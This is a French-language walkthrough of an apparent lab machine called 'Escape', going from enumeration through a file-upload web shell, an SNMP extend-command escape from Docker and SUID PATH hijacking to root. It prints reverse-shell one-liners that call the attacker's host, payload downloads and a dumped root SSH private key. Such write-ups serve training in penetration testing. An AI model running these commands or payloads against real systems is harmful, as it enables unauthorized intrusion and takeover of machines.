Escape

upload file suid openssl snmp

• Nom machine : Escape

• Difficulté : Difficile

• OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 04:37 EDT
Nmap scan report for 192.168.229.113
Host is up (0.035s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f0:85:61:65:d3:88:ad:49:6b:38:f4:ac:5b:90:4f:2d (RSA)
|   256 05:80:90:92:ff:9e:d6:0e:2f:70:37:6d:86:76:db:05 (ECDSA)
|_  256 c3:57:35:b9:8a:a5:c0:f8:b1:b2:e9:73:09:ad:c7:9a (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Escape
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Escape
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 04:57 EDT
Nmap scan report for 192.168.229.113
Host is up (0.033s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT    STATE SERVICE
161/udp open  snmp

HTTP (80)

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.229.113/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.229.113/__24-08-13_04-37-31.txt

Target: http://192.168.229.113/

[04:37:31] Starting: 
[04:37:33] 403 -  280B  - /.ht_wsr.txt
[04:37:33] 403 -  280B  - /.htaccess.bak1
[04:37:33] 403 -  280B  - /.htaccess.orig
[04:37:33] 403 -  280B  - /.htaccess.save
[04:37:33] 403 -  280B  - /.htaccess.sample
[04:37:34] 403 -  280B  - /.htaccess_orig
[04:37:34] 403 -  280B  - /.htaccess_extra
[04:37:34] 403 -  280B  - /.htaccess_sc
[04:37:34] 403 -  280B  - /.htaccessOLD
[04:37:34] 403 -  280B  - /.htaccessBAK
[04:37:34] 403 -  280B  - /.htaccessOLD2
[04:37:34] 403 -  280B  - /.htm
[04:37:34] 403 -  280B  - /.html
[04:37:34] 403 -  280B  - /.htpasswd_test
[04:37:34] 403 -  280B  - /.htpasswds
[04:37:34] 403 -  280B  - /.httr-oauth
[04:37:34] 403 -  280B  - /.php
[04:37:55] 403 -  280B  - /server-status
[04:37:55] 403 -  280B  - /server-status/

Task Completed

HTTP (8080)

Même image que précédemment

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.229.113:8080/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.229.113_8080/__24-08-13_04-38-31.txt

Target: http://192.168.229.113:8080/

[04:38:31] Starting: 
[04:38:35] 403 -  282B  - /.ht_wsr.txt
[04:38:35] 403 -  282B  - /.htaccess.bak1
[04:38:35] 403 -  282B  - /.htaccess.sample
[04:38:35] 403 -  282B  - /.htaccess.orig
[04:38:35] 403 -  282B  - /.htaccess.save
[04:38:35] 403 -  282B  - /.htaccess_extra
[04:38:35] 403 -  282B  - /.htaccess_orig
[04:38:35] 403 -  282B  - /.htaccessBAK
[04:38:35] 403 -  282B  - /.htaccess_sc
[04:38:35] 403 -  282B  - /.htaccessOLD
[04:38:35] 403 -  282B  - /.htaccessOLD2
[04:38:35] 403 -  282B  - /.htm
[04:38:35] 403 -  282B  - /.html
[04:38:35] 403 -  282B  - /.htpasswd_test
[04:38:35] 403 -  282B  - /.htpasswds
[04:38:35] 403 -  282B  - /.httr-oauth
[04:38:45] 301 -  323B  - /dev  ->  http://192.168.229.113:8080/dev/
[04:38:45] 200 -  508B  - /dev/
[04:38:56] 403 -  282B  - /server-status/
[04:38:56] 403 -  282B  - /server-status

Dev ?

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.229.113:8080/dev/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.229.113_8080/_dev__24-08-13_04-41-34.txt

Target: http://192.168.229.113:8080/

[04:41:34] Starting: dev/
[04:41:36] 200 -    8KB - /dev/.DS_Store
[04:41:37] 403 -  282B  - /dev/.ht_wsr.txt
[04:41:37] 403 -  282B  - /dev/.htaccess.bak1
[04:41:37] 403 -  282B  - /dev/.htaccess.orig
[04:41:37] 403 -  282B  - /dev/.htaccess.sample
[04:41:37] 403 -  282B  - /dev/.htaccess.save
[04:41:37] 403 -  282B  - /dev/.htaccess_extra
[04:41:37] 403 -  282B  - /dev/.htaccess_orig
[04:41:37] 403 -  282B  - /dev/.htaccess_sc
[04:41:37] 403 -  282B  - /dev/.htaccessBAK
[04:41:37] 403 -  282B  - /dev/.htaccessOLD
[04:41:37] 403 -  282B  - /dev/.htaccessOLD2
[04:41:37] 403 -  282B  - /dev/.htm
[04:41:37] 403 -  282B  - /dev/.html
[04:41:37] 403 -  282B  - /dev/.htpasswds
[04:41:37] 403 -  282B  - /dev/.htpasswd_test
[04:41:37] 403 -  282B  - /dev/.httr-oauth
[04:41:46] 301 -  327B  - /dev/css  ->  http://192.168.229.113:8080/dev/css/
[04:42:03] 403 -  282B  - /dev/uploads/
[04:42:03] 301 -  331B  - /dev/uploads  ->  http://192.168.229.113:8080/dev/uploads/

Le chemin dev/uploads peut possiblement être intéressant. Nous allons tester d'upload un fichier malveillant sur le serveur. sur la page, on nous indique que seul les gifs sont acceptés.

Accès initial

Nous testons un fichier gif pour voir si il est bien uploadé... et non ! Nous avons testé plusieurs choses avec Burp Suite:

• Intruder - tester un grand nombre d'extension --> sans résultat

• Changer manuellement le magic number --> sans résultat

• Jouer avec le Content-type --> sans résultat Jusqu'ici rien de surprenant, le site ne nous mène pas vers une fausse piste et il demande bien un fichier .gif

Nous allons voir le code source de la page.

<input type="hidden" name="MAX_FILE_SIZE" value="100000" />

Intéressant.... On supprime tout le contenu de notre gif sur Burp et on retente l'upload

"Uploaded"

Nous allons tester le chemin /uploads

Bingo ! Maintenant nous allons essayer d'upload un shell. Si nous changeons uniquement l'extension, le fichier peut toujours être upload. On ajoute donc notre code php en plein milieu de la requête en renomons le fichier : shell.php

Nous touchons au but.

La commande whoami nous indique bien www-data. Nous essayons which nc et n'avons pas de réponse, which bash indique /bin/bash, pas de réponse pour which python (problématique pour upgrade le shell)

On génère un reverse shell avec https://www.revshells.com/ en lançons un listeneur... Sans résultat. Nous allons tenter autrement, on va directement uploader php-pentest-monkey, de la même manière que le shell précédent. Et cela fonctionne !

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 80                      
listening on [any] 80 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.229.113] 38812
Linux a7c367c2113d 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 GNU/Linux
 09:30:59 up 57 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@a7c367c2113d:/$ whoami
whoami
www-data

Elévation des privilèges

Nous lançons un serveur python sur le port 8888 de notre machine kali et exécutons linpeas.

www-data@a7c367c2113d:/tmp$ curl -O http://192.168.45.217:8888/Tools/linpeas.sh
<curl -O http://192.168.45.217:8888/Tools/linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:-100  842k  100  842k    0     0  2040k      0 --:--:-- --:--:-- --:--:-- 2045k
www-data@a7c367c2113d:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@a7c367c2113d:/tmp$ ./linpeas.sh

Rien qui ne saute véritablement aux yeux... Cependant certains fichier peuvent sembler intéressants, en se rappelant l'énumération initiale.

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rwxr--r-- 1 root root 7340 Dec  9  2020 /var/backups/.snmpd.conf
-rw-r--r-- 1 www-data www-data 8196 Dec  9  2020 /var/www/html/dev/.DS_Store
-rw-r--r-- 1 root root 6961 Nov 18  2020 /usr/local/lib/php/.filemap
-rw-r--r-- 1 root root 0 Nov 18  2020 /usr/local/lib/php/.lock
-rw------- 1 root root 0 Nov 17  2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 18  2019 /etc/skel/.bash_logout

{...}
 host
#rocommunity public  localhost
                                                 #  Default access to basic system info
 rocommunity public  default    -V systemonly
                                                 #  rocommunity6 is for IPv6
 rocommunity6 public  default   -V systemonly

 rocommunity 53cur3M0NiT0riNg
{...}
#  EXTENDING THE AGENT
#

#
#  Arbitrary extension commands
#
 extend    test1   /bin/echo  Hello, world!
 extend-sh test2   echo Hello, world! ; echo Hi there ; exit 35
 extend-sh test3   /bin/sh /tmp/shtest
{...}

Deux informations importantes :

• Nous avons le mot de passe : 53cur3M0NiT0riNg

• Un fichier est exécuté : /tmp/shtest

Nous allons y placer un reverse-shell

┌──(kali㉿kali)-[~]
└─$ cat shtest
#!/bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.217 80 >/tmp/f

www-data@a7c367c2113d:/$ cd /tmp
cd /tmp
www-data@a7c367c2113d:/tmp$ curl -O http://192.168.45.217:8888/shtest
curl -O http://192.168.45.217:8888/shtest
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    95  100    95    0     0   1557      0 --:--:-- --:--:-- --:--:--  1557

Nous allons le télécharger dans le dossier /tmp de notre machine cible.

┌──(kali㉿kali)-[~]
└─$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.229.113 NET-SNMP-EXTEND-MIB::nsExtendObjects
{...}

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 22
listening on [any] 22 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.229.113] 35110
bash: cannot set terminal process group (770): Inappropriate ioctl for device
bash: no job control in this shell
Debian-snmp@escape:/$ whoami
whoami
Debian-snmp

Nous avons bien échappé à Docker ! Maintenant nous devons devenir root

Debian-snmp@escape:/home/tom$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/logconsole
/usr/bin/sudo
/usr/bin/at
/usr/bin/chfn
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/su

Un binaire est inhabituel : /usr/bin/logconsole Nous allons l'exécuter pour voir ce qu'il fait.

Debian-snmp@escape:/home/tom$ /usr/bin/logconsole
/usr/bin/logconsole


 /$$                                                                       /$$          
| $$                                                                      | $$          
| $$  /$$$$$$   /$$$$$$   /$$$$$$$  /$$$$$$  /$$$$$$$   /$$$$$$$  /$$$$$$ | $$  /$$$$$$ 
| $$ /$$__  $$ /$$__  $$ /$$_____/ /$$__  $$| $$__  $$ /$$_____/ /$$__  $$| $$ /$$__  $$
| $$| $$  \ $$| $$  \ $$| $$      | $$  \ $$| $$  \ $$|  $$$$$$ | $$  \ $$| $$| $$$$$$$$
| $$| $$  | $$| $$  | $$| $$      | $$  | $$| $$  | $$ \____  $$| $$  | $$| $$| $$_____/
| $$|  $$$$$$/|  $$$$$$$|  $$$$$$$|  $$$$$$/| $$  | $$ /$$$$$$$/|  $$$$$$/| $$|  $$$$$$$
|__/ \______/  \____  $$ \_______/ \______/ |__/  |__/|_______/  \______/ |__/ \_______/
               /$$  \ $$                                                                
              |  $$$$$$/                                                                
               \______/                                                                 

                                                                                                                                         
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit 
99. Generate the Report 

Enter the option ==> 1

Linux escape 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Ok, il permet d'exécuter des commandes. Nous allons voir si on ne peut pas remplacer l'une de ses commandes par un shell. Si le binaire appele par un chemin absolu, nous ne pourrons pas le remplacer (sauf si chemin ouvert en écriture pour nous). Nous n'avons pas la commande string sur la cible, nous allons donc récupérer le binaire sur notre machine. Téléchargeons nc sur la cible, avec un serveur python puis

Debian-snmp@escape:/tmp$ nc 192.168.45.217 1234 < /usr/bin/logconsole

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234 > logconsole       
listening on [any] 1234 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.229.113] 39356

┌──(kali㉿kali)-[~]
└─$ strings logconsole
/lib64/ld-linux-x86-64.so.2
mgUa
fopen
__isoc99_scanf
setreuid
putchar
stdin
popen
printf

{...}
[1;31m
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit 
99. Generate the Report 
[01;33m
Enter the option ==> 
/bin/uname -a
/bin/ps aux
/usr/bin/last
/usr/bin/w
/sbin/ip route | column -t
lscpu
{...}

La plupart des commandes utilisent leur chemin absolu. Ce n'est pas le cas de lscpu.

┌──(kali㉿kali)-[~]
└─$ cat lscpu 
#!/bin/bash

/bin/bash -i >& /dev/tcp/192.168.45.217/21 0>&1

Debian-snmp@escape:/$ cd /tmp
cd /tmp
Debian-snmp@escape:/tmp$ curl -O http://192.168.45.217:8888/lscpu
curl -O http://192.168.45.217:8888/lscpu
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --100    61  100    61    0     0    953      0 --:--:-- --:--:-- --:--:--   953
Debian-snmp@escape:/tmp$ chmod +x lscpu
chmod +x lscpu
Debian-snmp@escape:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
Debian-snmp@escape:/tmp$ /usr/bin/logconsole

Choisir le 6

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 21
listening on [any] 21 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.229.113] 35918
bash: cannot set terminal process group (770): Inappropriate ioctl for device
bash: no job control in this shell
tom@escape:/tmp$ cd 

On relance linpeas... /opt/cert/openssl =ep is writable

tom@escape:/opt/cert$ ls -al
ls -al
total 724
drwxr-xr-x 2 root root   4096 Dec  9  2020 .
drwxr-xr-x 4 root root   4096 Dec  9  2020 ..
-rwx------ 1 root root   1245 Dec  9  2020 certificate.pem
-rwx------ 1 root root   1704 Dec  9  2020 key.pem
-rwxr-x--- 1 tom  tom  723944 Dec  9  2020 openssl

tom@escape:/opt/cert$ /opt/cert/openssl enc -in "/root/.ssh/id_rsa"
/opt/cert/openssl enc -in "/root/.ssh/id_rsa"
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwwvvVIS3//uz+Mpg24l51p48akveZgI8bDQDun7y9BKhRDWg
GzIzCpt7NcVWVN2llo9KOL3c3EZZxGOaTbzpINZxSWj3/WWBYhNqmKQRsgJzbPv2
kOe/XwWw8Bt9TuFAd7GUbylpbyHOES7siXFUd/XP503ehllp/JFp0G+2YPkYPGbi
0EISJcNFPNnRlXIQs3Fte0QqFiPE9nPycSMqvGz8a9OtaPGlmOZ3wP56jxxIBT0I
SrkfuLGw7b9VN05jJ33EMtDGRyyDLljFXv7t5OktkC0omumXyWG2KRRe3Avn4RMI
V+IE0rS8N2pIymRF3u8U/9YMX/Ps2EPvNQFkTQIDAQABAoIBAQCXXa/Ce6z/76pf
rU81kJ8JO4vPQkm6CIozvroWBWcumzaj5Kn38SFDXh5kQF0bR1e2XEVRe6bnG4GW
s2WQZsbVQRZxzhCGiju6jS7wfoNtDhHdxjw3gGI3sAb8j5jTmmOZgCqdihnUsPtm
wm+2ykivQAi0jO3gfYuPApqHs+ppngt2KeMUZesIz4BWuFAnS0ePK/tpTHpZ4KRj
D/sb1kdseaCmPfOD6oTMGNtTiakkDUzObN3Pw19v5wkHfawTbmsSeiPmW1nC5xh/
OI7K+wbVUCj3Dys3xqKoCMK27y+pYHzzoiz7ol+OitIth6ucDe6NC6cFbVPmW2o0
fk+U8VbRAoGBAOcfAlARjYV6qc2ukF9NYlVy/WYoP3zFzfb7uYu9I1OpLID+PYeN
ixpqKKgRoxM+ndsWWnyHjw5Kyq2+DHBE67OOpbd69y+fUYOhFiSH2TnQsB1LPtkH
ZT0pZyaBavQLZFZChpOeQ96qfEw5xwA65zENCSFoGoILHS92akVmWQnTAoGBANgK
0qNNsJYETJSob/KdnMYXbE3tPjNkdCzKXXklgZXeUKn6U//0vRhJWZGHv8RDWrlh
1wc9Op88Dx003Ay+3vVqjOs7ur46KankMTj+PN5B5CX1CioXtJ9T6qRF+8+46oq7
pXBTqfi7Gp2m+RuQJS9Ct2bu6OUYgGdUzQ8p/+VfAoGAOhCnUxhl1sAPgxY1PUxC
xTcDhLPd52oGqeNqJTpacr1Q6gN1z+V2qic7maX8s2wK2q0OBLVF8pBFxUq280nN
caoH5kXlbjh3kTtaRck/gO/2HxX1by8Vdz08pgbjqPZnuegyyUl8wadRXREy9tLV
nJQq1BLEfiFurqrwXgktm3MCgYEAroDPcyilogcG9Gy5P/cfUsJIsQkYXNqfHC65
IcmxyiQwc5vHjc9ZjexxdKN5ukXNWkA1N5u1ZjlU2/p+Y60o2oKeIMO2K0E/tgKj
36077Sq75gzvkOBk/O0Dcn000KxEhprbHsf1WvuGnCDqxeDAqFPzYClJ5QLNdKmC
mOUL1XECgYB1wX6H2xWJ+GvC1qKVs4WOYjfCvVZTh+9i8CpA1i4xmmmXXnc+jy/O
Bl7VLsdfeQ3L/NOBTng09PO2lwSWdghCMeS25rMm6/xZTOduauGVTMKx4DT7FvX6
NLU86rcVJCcqL0LdcJ7/2tmwsyuqhCLQ0fl37ZCS93LTXqGUzXfViw==
-----END RSA PRIVATE KEY-----

┌──(kali㉿kali)-[~]
└─$ nano id_rsa                      
                                                                  
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa                                       
                                                                  
┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.229.113 -i id_rsa
The authenticity of host '192.168.229.113 (192.168.229.113)' can't be established.
ED25519 key fingerprint is SHA256:BFNHiG0TgvKeKOogN97RoTQRycbNoZgxixjThnW0398.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.229.113' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-124-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Aug 13 08:24:08 EDT 2024

  System load:  0.0                Processes:              175
  Usage of /:   26.9% of 15.68GB   Users logged in:        0
  Memory usage: 25%                IP address for docker0: 172.17.0.1
  Swap usage:   0%                 IP address for ens192:  192.168.229.113


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

14 packages can be updated.
10 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@escape:~# 

Nous sommes root !